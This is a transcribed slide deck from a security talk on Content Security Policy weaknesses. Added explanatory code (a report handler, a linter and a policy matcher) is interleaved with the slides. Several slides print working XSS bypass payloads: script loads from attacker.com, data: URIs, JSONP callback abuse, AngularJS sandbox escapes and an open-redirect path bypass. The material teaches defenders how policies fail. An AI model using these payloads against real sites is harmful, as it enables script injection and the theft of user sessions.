CSP Is Dead, Long Live Strict CSP! Lukas Weichselbaum - PowerPoint PPT Presentation
  1. CSP Is Dead, Long Live Strict CSP! Lukas Weichselbaum

  2. About Us. Lukas Weichselbaum, Senior Information Security Engineer. Michele Spagnuolo, Senior Information Security Engineer. We work in a special focus area of the Google security team aimed at improving product security by targeted proactive projects to mitigate whole classes of bugs.

  3. WHAT IS CSP ? A tool developers can use to lock down their web applications in various ways. CSP is a defense-in-depth mechanism - it reduces the harm that a malicious injection can cause, but it is not a replacement for careful input validation and output encoding.

  4. GOALS OF CSP. Have been pretty ambitious... (CSP 2 specification: https://www.w3.org/TR/CSP/ ; CSP 3 draft: https://w3c.github.io/webappsec-csp/)
     MITIGATE XSS: granular control over resources that can be executed, e.g. execution of inline scripts, dynamic code execution (eval), trust propagation.
     REDUCE PRIVILEGE: sandbox not just iframes, but any resource, framed or not. The content is forced into a unique origin, preventing it from running scripts or plugins, submitting forms, etc... This reduces the privilege risk of the application.
     DETECT EXPLOITATION: find out when your application gets exploited, or behaves differently from how you think it should behave. By collecting violation reports, an administrator can be alerted and easily spot the bug (monitoring violations).

  5. WHAT'S IN A POLICY? It's a HTTP header. Actually, two: Content-Security-Policy (enforcing mode) and Content-Security-Policy-Report-Only (report-only mode). CSP directives, most of them useless for XSS mitigation: base-uri, default-src, connect-src, img-src, font-src, child-src, script-src, frame-ancestors, media-src, object-src, style-src, plugin-types, report-uri. We'll focus on script-src.

  6. HOW DOES IT WORK? A policy in detail. money.example.com sends:
     Content-Security-Policy: default-src 'self'; script-src 'self' yep.com; report-uri /csp_violation_logger;
     CSP allows <img src="cat.png"> (loaded from money.example.com itself, i.e. 'self').
     CSP allows <script src="//yep.com/x.js"> (yep.com is whitelisted in script-src).

  7. HOW DOES IT WORK? Script injections (XSS) get blocked. Same policy on money.example.com:
     Content-Security-Policy: default-src 'self'; script-src 'self' yep.com; report-uri /csp_violation_logger;
     CSP allows <img src="cat.png"> and <script src="//yep.com/x.js"> as before.
     CSP blocks ">'><script src="//attacker.com"> (source not whitelisted).
     CSP blocks ">'><script>alert(42)</script> (inline script not allowed).
     DEMO: the violation reports arrive at money.example.com/csp_violations_logger.
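The report-uri side of slide 7, as an added example that is not part of the slides: a minimal handler for the JSON a browser POSTs to an endpoint such as /csp_violation_logger, which classifies each report and groups the suspicious ones so an injected page stands out. The field names are those of the CSP2 report format; the sample reports, the page URL and the extension identifier are constructed for this example.

```javascript
// Added example, not from the slides: a handler for CSP violation reports
// as POSTed to the report-uri endpoint of slide 7. Field names follow the
// CSP2 "csp-report" format; the sample reports below are constructed.

// Browser extensions and about:blank frames cause violations that are not injections.
const NOISE = /^(chrome|moz|safari|ms-browser)-extension:|^about$/;

// Turn one raw POST body into a classified record.
function classifyReport(body) {
  const r = JSON.parse(body)["csp-report"];
  if (!r) throw new Error("not a CSP violation report");
  const blocked = r["blocked-uri"] || "";
  // CSP2 sends effective-directive; CSP1 only had violated-directive (with its values)
  const directive = (r["effective-directive"] || r["violated-directive"] || "").split(" ")[0];
  let kind;
  if (blocked === "inline" || blocked === "eval") kind = "inline-script";
  else if (NOISE.test(blocked)) kind = "noise";
  else kind = "external-source";
  // Only script-src violations matter for XSS; the rest is monitoring data.
  const suspicious = directive === "script-src" && kind !== "noise";
  return { page: r["document-uri"], directive, blocked, kind, suspicious };
}

// Group the suspicious reports so one injected page shows up as a cluster.
function summarize(bodies) {
  const buckets = new Map();
  for (const b of bodies) {
    const c = classifyReport(b);
    if (!c.suspicious) continue;
    const key = `${c.page} ${c.kind} ${c.blocked}`;
    buckets.set(key, (buckets.get(key) || 0) + 1);
  }
  return [...buckets.entries()].sort((a, b) => b[1] - a[1]); // [[key, count], ...]
}

// Build a constructed report in the shape a browser would send for slide 7's policy.
function mk(blocked, page = "https://money.example.com/profile?q=1") {
  return JSON.stringify({ "csp-report": {
    "document-uri": page, "referrer": "",
    "violated-directive": "script-src 'self' yep.com",
    "effective-directive": "script-src",
    "original-policy": "default-src 'self'; script-src 'self' yep.com; report-uri /csp_violation_logger",
    "blocked-uri": blocked } });
}

// Constructed sample: the two blocked payloads of slide 7 plus an extension false positive.
const SAMPLE_REPORTS = [
  mk("https://attacker.com"), mk("https://attacker.com"),
  mk("inline"),
  mk("chrome-extension://abcdefghijklmnop"),
];
```

summarize(SAMPLE_REPORTS) yields two buckets, the attacker.com script load (twice) and the inline script (once); the extension report is dropped as noise rather than paged out to an administrator.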

  8. BUT... IT'S HARD TO DEPLOY. Two examples from Twitter and Gmail.

  9. BUT... IT'S HARD TO DEPLOY. Two examples from Twitter and Gmail. Policies get less secure the longer they get. These are not strict... they allow 'unsafe-inline' (and 'unsafe-eval'). Even if they removed 'unsafe-inline' (or added a nonce), any JSONP endpoint on whitelisted domains/paths can be the nail in their coffin. In practice, in a lot of real-world complex applications CSP is just used for monitoring purposes, not as a defense-in-depth against XSS.

  10. [section divider; title garbled: "eaking ad"]

  11. COMMON MISTAKES [1/4] Trivial mistakes: 'unsafe-inline' in script-src (and no nonce). Same for default-src, if there's no script-src directive.
      Policy: script-src 'self' 'unsafe-inline'; object-src 'none';
      Bypass: ">'><script>alert(1337)</script>

  12. COMMON MISTAKES [2/4] Trivial mistakes: URL schemes or wildcard in script-src (and no 'strict-dynamic'). Same for URL schemes and wildcards in object-src.
      Policy: script-src 'self' https: data: *; object-src 'none';
      Bypasses: ">'><script src=https://attacker.com/evil.js></script>
                ">'><script src=data:text/javascript,alert(1337)></script>

  13. COMMON MISTAKES [3/4] Less trivial mistakes: missing object-src or default-src directive.
      Policy: script-src 'self'; It looks secure, right?
      Bypass: nothing restricts object-src, so a Flash object from any origin can be embedded with script access to the page:
      ">'><object type="application/x-shockwave-flash" data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//'><param name="AllowScriptAccess" value="always"></object>

  14. COMMON MISTAKES [4/4] Less trivial mistakes: allowing 'self' + hosting user-provided content on the same origin. Same for object-src.
      Policy: script-src 'self'; object-src 'none';
      Bypass: ">'><script src="/user_upload/evil_cat.jpg.js"></script>
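The four mistakes of slides 11 to 14 as a linter, added here as an example; it is neither the slides' code nor the CSP Evaluator library. It parses a policy header into a directive map, applies the default-src fallback the browser uses when script-src or object-src is absent, and returns errors (slides 11 to 13) and notes (slide 14, where 'self' is only unsafe if the origin also serves user uploads or JSONP, which a policy string alone cannot tell). The policies it is exercised with are the slides' own.

```javascript
// Added example, not from the slides and not the CSP Evaluator library:
// a small linter for the common mistakes of slides 11-14.

function parsePolicy(header) {
  const directives = new Map();
  for (const part of header.split(";")) {
    const [name, ...values] = part.trim().split(/\s+/).filter(Boolean);
    // browsers ignore a repeated directive, so the first occurrence wins
    if (name && !directives.has(name.toLowerCase())) directives.set(name.toLowerCase(), values);
  }
  return directives;
}

// script-src and object-src fall back to default-src when not set (slides 11, 13).
function effective(directives, name) {
  for (const n of [name, "default-src"]) {
    if (directives.has(n)) return { from: n, values: directives.get(n).map(v => v.toLowerCase()) };
  }
  return null;
}

const SCHEME = /^[a-z][a-z0-9+.\-]*:$/;          // https: data: blob: ...
const NONCE_OR_HASH = /^'(nonce-|sha(256|384|512)-)/; // a nonce or hash makes browsers ignore 'unsafe-inline'

function lintPolicy(header) {
  const d = parsePolicy(header);
  const errors = [], notes = [];
  const script = effective(d, "script-src");
  const object = effective(d, "object-src");

  if (!script) {
    errors.push("no script-src and no default-src: scripts from anywhere run");
  } else {
    const v = script.values;
    if (v.includes("'unsafe-inline'") && !v.some(x => NONCE_OR_HASH.test(x)))
      errors.push(`${script.from}: 'unsafe-inline' without a nonce or hash`);        // slide 11
    if (!v.includes("'strict-dynamic'"))                                              // slide 12
      for (const x of v)
        if (x === "*" || SCHEME.test(x))
          errors.push(`${script.from}: wildcard or URL scheme ${x}`);
    if (v.includes("'self'"))                                                         // slide 14
      notes.push(`${script.from}: 'self' is unsafe if this origin serves user uploads or JSONP`);
  }
  if (!object)                                                                        // slide 13
    errors.push("no object-src and no default-src: plugin content can run script");
  else if (object.values.some(x => x === "*" || SCHEME.test(x)))
    errors.push(`${object.from}: wildcard or URL scheme in object-src`);
  return { errors, notes };
}
```

Run against the slides' policies, the slide 11 and 13 policies produce one error each, the slide 12 policy three (https:, data: and *), and slide 14's script-src 'self'; object-src 'none'; produces no error but the 'self' note.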

  15. BYPASSING CSP [1/5] Whitelist bypasses: JSONP-like endpoint in whitelist.
      Policy: script-src 'self' https://whitelisted.com; object-src 'none';
      Bypass: ">'><script src="https://whitelisted.com/jsonp?callback=alert"> DEMO

  16. BYPASSING CSP [2/5] JSONP is a problem. On bypassable.com:
      CSP allows ">'><script src="https://whitelisted.com/jsonp?callback=alert(1);u"> and the response is alert(1);u({...})
      A SOME* attack: CSP allows ">'><script src="https://whitelisted.com/jsonp?callback=x.click"> and the response is x.click({...}) (* Same Origin Method Execution)
      1) You whitelist an origin/path hosting a JSONP endpoint. 2) JavaScript execution is allowed; the extent depends on how liberal the JSONP endpoint is and what a user can control (just the callback function or also parameters).
      Don't whitelist JSONP endpoints. Sadly, there are a lot of those out there... especially on CDNs!
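Why a whitelisted JSONP endpoint (slides 15 and 16) defeats script-src, shown as an added example rather than the slides' code: the two response generators below are a typical endpoint and a version that restricts the callback to one identifier. The endpoint, its data and the list of JSONP-hosting domains are constructed; the callback values are the slides' payloads. The validated variant stops "alert(1);u" and the SOME payload "x.click", but a plain "alert" is a valid identifier, so the whitelisted endpoint still hands the attacker a function call in the page's origin.

```javascript
// Added example, not from the slides: JSONP responses as a CSP bypass.
// DATA and KNOWN_JSONP_HOSTS are constructed stand-ins for this example.

const DATA = { user: "bob", balance: 42 };

// A typical JSONP endpoint: the callback parameter lands verbatim in a script body.
function jsonpUnsafe(callback) {
  return `${callback}(${JSON.stringify(DATA)})`;
}

// Restricting the callback to one identifier blocks "alert(1);u" and "x.click",
// but "alert" still passes and the browser still executes alert({...}).
const IDENT = /^[A-Za-z_$][A-Za-z0-9_$]*$/;
function jsonpValidated(callback) {
  if (!IDENT.test(callback)) throw new Error("invalid callback");
  return `${callback}(${JSON.stringify(DATA)})`;
}

// Does the script the page will run begin with an attacker-chosen call?
function executesAttackerCall(body, fn) {
  return body.startsWith(fn + "(");
}

// Policy side: flag script-src entries whose host is known to serve JSONP.
// The constructed list stands in for the 8.8 million endpoints of slide 22.
const KNOWN_JSONP_HOSTS = ["whitelisted.com"];
function jsonpHostsInWhitelist(header, known = KNOWN_JSONP_HOSTS) {
  const m = /(?:^|;)\s*script-src\s+([^;]*)/i.exec(header);
  if (!m) return [];
  return m[1].trim().split(/\s+/).filter(src =>
    known.includes(src.replace(/^[a-z]+:\/\//i, "").split(/[/:]/)[0].toLowerCase()));
}
```

The only robust fix the slides give is the one in the last line of slide 16: do not whitelist the host at all.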

  17. BYPASSING CSP [3/5] Whitelist bypasses: AngularJS library in whitelist.
      Policy: script-src 'self' https://whitelisted.com; object-src 'none';
      Bypass: "><script src="https://whitelisted.com/angular.min.js"></script><div ng-app ng-csp>{{1336 + 1}}</div>
      Also works without user interaction, e.g. by combining with JSONP endpoints or other JS libraries; the ng-click variant:
      "><script src="https://whitelisted.com/angularjs/1.1.3/angular.min.js"></script><div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>

  18. BYPASSING CSP [4/5] AngularJS is a problem. On bypassable.com:
      Sandbox bypass in AngularJS: CSP allows <script src="//whitelisted.com/angular.js"></script><div ng-app ng-csp ng-click=$event.view.alert(1337)>
      Outdated AngularJS + outdated Prototype.js giving access to window: CSP allows <script src="//whitelisted.com/angular.js"></script><script src="//whitelisted.com/prototype.js"></script><div ng-app ng-csp>{{$on.curry.call().alert(1)}}
      Powerful JS frameworks are a problem: 1) You whitelist an origin/path hosting a version of AngularJS with known sandbox bypasses. Or you combine it with outdated Prototype.js. Or JSONP endpoints. 2) The attacker can exploit those to achieve full XSS.
      Don't use CSP in combination with CDNs hosting AngularJS. For more bypasses in popular CDNs, see Cure53's mini-challenge.

  19. BYPASSING CSP [5/5] Path relaxation due to open redirect in whitelist.
      Policy: script-src https://whitelisted.com/totally/secure.js https://site.with.redirect.com; object-src 'none';
      A direct ">'><script src="https://whitelisted.com/jsonp?callback=alert"> does not match the whitelisted path, but the path is ignored after a redirect!
      Bypass: ">'><script src="https://site.with.redirect.com/redirect?url=https%3A//whitelisted.com/jsonp%2Fcallback%3Dalert">
      Spec: "To avoid leaking path information cross-origin (as discussed in Homakov's Using Content-Security-Policy for Evil), the matching algorithm ignores path component of a source expression if the resource loaded is the result of a redirect."
      Flow: money.example.com loads <script src="https://site.with.redirect.com/redirect?url=https%3A//whitelisted.com/jsonp%2Fcallback%3Dalert"></script>; CSP allows site.with.redirect.com; the redirect lands on whitelisted.com/jsonp; CSP allows it, because the path is ignored after the redirect.
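The allow/block decisions of slides 6 and 7 and the path-relaxation rule of slide 19 in one place, as an added example: a simplified CSP2 source matcher, not the slides' code and not the CSP Evaluator library. It implements 'self', 'none', 'unsafe-inline', scheme sources, host sources with wildcard host, port and path, the default-src fallback, and the rule that the path component is ignored once the resource arrived through a redirect. Nonces, hashes and 'strict-dynamic' are left out. The policies, page URL and request URLs are the slides' own values; the redirected flag is an assumption standing in for what the browser knows about the fetch.

```javascript
// Added example, not from the slides: a simplified CSP2 source matcher.
// Omits nonces, hashes and 'strict-dynamic'; the "redirected" flag is the
// caller's knowledge that the response came via a redirect.

const HOST_SOURCE = /^(?:([a-z][a-z0-9+.\-]*):\/\/)?(\*|(?:\*\.)?[a-z0-9\-.]+)(?::(\*|\d+))?(\/[^\s]*)?$/i;
const DEFAULT_PORT = { "http:": "80", "https:": "443" };

// Values of one directive; img-src, script-src, object-src... fall back to default-src.
function directiveValues(header, name) {
  for (const n of [name, "default-src"]) {
    const m = new RegExp("(?:^|;)\\s*" + n + "\\s+([^;]*)", "i").exec(header);
    if (m) return m[1].trim().split(/\s+/);
  }
  return null;
}

function sourceMatches(src, url, page, redirected) {
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return url.origin === page.origin;
  if (s.startsWith("'")) return false;                       // other keywords never match a URL
  if (/^[a-z][a-z0-9+.\-]*:$/.test(s)) return url.protocol === s;   // scheme source, e.g. https:
  const m = HOST_SOURCE.exec(s);
  if (!m) return false;
  const [, scheme, host, port, path] = m;
  // scheme: explicit must match; absent means the page's scheme (https always acceptable)
  if (scheme ? url.protocol !== scheme + ":" : (url.protocol !== page.protocol && url.protocol !== "https:")) return false;
  // host: '*' matches anything, '*.x' matches subdomains of x, otherwise exact
  if (host !== "*") {
    if (host.startsWith("*.")) { if (!url.hostname.endsWith(host.slice(1))) return false; }
    else if (url.hostname !== host) return false;
  }
  // port: an absent port means the scheme's default port
  const urlPort = url.port || DEFAULT_PORT[url.protocol] || "";
  if (port !== "*" && (port || DEFAULT_PORT[url.protocol] || "") !== urlPort) return false;
  // path (slide 19): exact unless it ends with '/', and ignored entirely after a redirect
  if (path && !redirected) {
    if (path.endsWith("/") ? !url.pathname.startsWith(path) : url.pathname !== path) return false;
  }
  return true;
}

// req is {inline: true} or {url, redirected?}; url is resolved against the page.
function allowed(header, directive, pageUrl, req) {
  const page = new URL(pageUrl);
  const values = directiveValues(header, directive);
  if (!values) return true;                                   // no directive: unrestricted (slide 13)
  if (req.inline) return values.some(v => v.toLowerCase() === "'unsafe-inline'");
  const url = new URL(req.url, page);                         // "//attacker.com" resolves against the page
  return values.some(v => sourceMatches(v, url, page, !!req.redirected));
}

// The slides' policies and page.
const SLIDE_7 = "default-src 'self'; script-src 'self' yep.com; report-uri /csp_violation_logger";
const SLIDE_19 = "script-src https://whitelisted.com/totally/secure.js https://site.with.redirect.com; object-src 'none'";
const PAGE = "https://money.example.com/";
```

With SLIDE_7, cat.png and //yep.com/x.js are allowed, //attacker.com and the inline script are blocked. With SLIDE_19, the direct load of whitelisted.com/jsonp fails on the path, the redirector host is allowed, and the same jsonp URL reached through the redirect is allowed because the path is no longer checked.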

  20. CSP EVALUATOR "A Tool to Rule Them All" https://csp-evaluator.withgoogle.com
      ● Core library is open source
      ● Also as a Chrome Extension

  21. How secure are real-world CSP policies? Largest Empirical Study on Effectiveness of CSPs in the Web: "CSP is Dead, Long Live CSP: On the Insecurity of Whitelists and the Future of Content Security Policy", Lukas Weichselbaum, Michele Spagnuolo, Sebastian Lekies, Artur Janc. ACM CCS 2016, Vienna. https://goo.gl/VRuuFN

  22. How secure are real-world CSP policies? Largest Empirical Study on Effectiveness of CSPs in the Web. Data collection pipeline: Google Index (100 billion pages) -> CSP filter -> 1.6 million CSPs -> dedupe -> 26,011 hosts with unique CSPs. In addition to the CSPs, we also collected JSONP endpoints (JSONP filter: 8.8 million endpoints) and Angular libraries (Angular filter: 2.6 million libraries) from the WWW, i.e. the whitelist bypasses.

  23. How secure are real-world CSP policies? Largest Empirical Study on Effectiveness of CSPs in the Web. Policies per category (count and share of that row's total):

                            Total   Report Only    unsafe-inline    Missing         Wildcard in      Bypassable domain   Trivially
                                                   in script-src    object-src      script-src       in whitelist        Bypassable
                                                                                    whitelist
      Unique CSPs           26011   2591   9.96%   21947  84.38%    3131   12.04%   5753   22.12%    19719  75.81%       24637  94.72%
      XSS Policies          22425   0      0%      19652  87.63%    2109   9.40%    4816   21.48%    17754  79.17%       21232  94.68%
      Strict XSS Policies   2437    0      0%      0      0%        348    14.28%   0      0%        1015   41.65%       1244   51.05%
